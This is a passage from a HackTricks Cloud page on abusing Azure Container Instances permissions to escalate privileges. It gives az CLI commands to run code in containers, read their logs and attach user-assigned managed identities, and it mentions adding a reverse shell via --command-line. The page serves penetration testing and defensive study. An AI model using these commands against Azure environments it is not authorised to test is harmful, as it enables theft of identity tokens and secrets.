HackTricks CloudAz - Azure Container Instances Privesc
Reading time: 3 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Azure Container Instances
Fore more information check:
Microsoft.ContainerInstance/containerGroups/read, Microsoft.ContainerInstance/containerGroups/containers/exec/action
These permissions allow the user to execute a command in a running container. This can be used to escalate privileges in the container if it has any managed identity attached. Ofc, it's also possible to access the source code and any other sentitive information storeed inside the container.
To execute a ls and get the output is as simple as:
az container exec --name <container-name> --resource-group <res-group> --exec-command 'ls'
It's also possible to read the output of the container with:
az container attach --name <container-name> --resource-group <res-group>
Or get the logs with:
az container logs --name <container-name> --resource-group <res-group>
Microsoft.ContainerInstance/containerGroups/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
These permissions allows to attach a user managed identity to a container group. This is very useful to escalate privileges in the container.
To attach a user managed identity to a container group:
az rest \
--method PATCH \
--url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerInstance/containerGroups/<container-name>?api-version=2021-09-01" \
--body '{
"identity": {
"type": "UserAssigned",
"userAssignedIdentities": {
"/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>": {}
}
}
}' \
--headers "Content-Type=application/json"
Microsoft.Resources/subscriptions/resourcegroups/read, Microsoft.ContainerInstance/containerGroups/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
These permission allows to create or update a container group with a user managed identity attached to it. This is very useful to escalate privileges in the container.
az container create \
--resource-group <res-group>> \
--name nginx2 \
--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
--assign-identity "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>" \
--restart-policy OnFailure \
--os-type Linux \
--cpu 1 \
--memory 1.0
Moreover, it's also possible to update an existing container group adding for example the --command-line argument with a reverse shell.
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.